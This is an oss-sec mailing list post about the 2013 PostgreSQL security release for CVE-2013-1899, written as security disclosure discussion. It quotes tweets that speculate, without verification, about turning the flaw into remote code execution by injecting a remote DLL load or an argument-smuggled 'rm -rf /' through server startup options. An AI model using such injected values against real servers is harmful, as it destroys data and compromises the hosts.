oss-sec mailing list archives
Re: PostgreSQL security update
From: Solar Designer <solar () openwall com>
Date: Thu, 4 Apr 2013 18:48:16 +0400
On Thu, Apr 04, 2013 at 06:39:31PM +0400, Solar Designer wrote:
A heads-up in case someone missed today's news: http://www.postgresql.org/about/news/1456/ http://www.postgresql.org/support/security/faq/2013-04-04/
HD Moore's quick tweets on possible exploitability of CVE-2013-1899 into remote code execution (beyond the attack vectors mentioned in "2013-04-04 Security Release FAQ" above): <@hdmoore> @quine exploitation seems tricky, I wonder if -c shared_preload_libraries=\\unc\share\blah.dll is doable <@hdmoore> @quine Another options appears to be something like: -c archive_command=rm${IFS}-rf${IFS}/ Indeed, these have not been verified yet and they might not be doable. Alexander
Current thread:
- PostgreSQL security update Solar Designer (Apr 04)
- Re: PostgreSQL security update Solar Designer (Apr 04)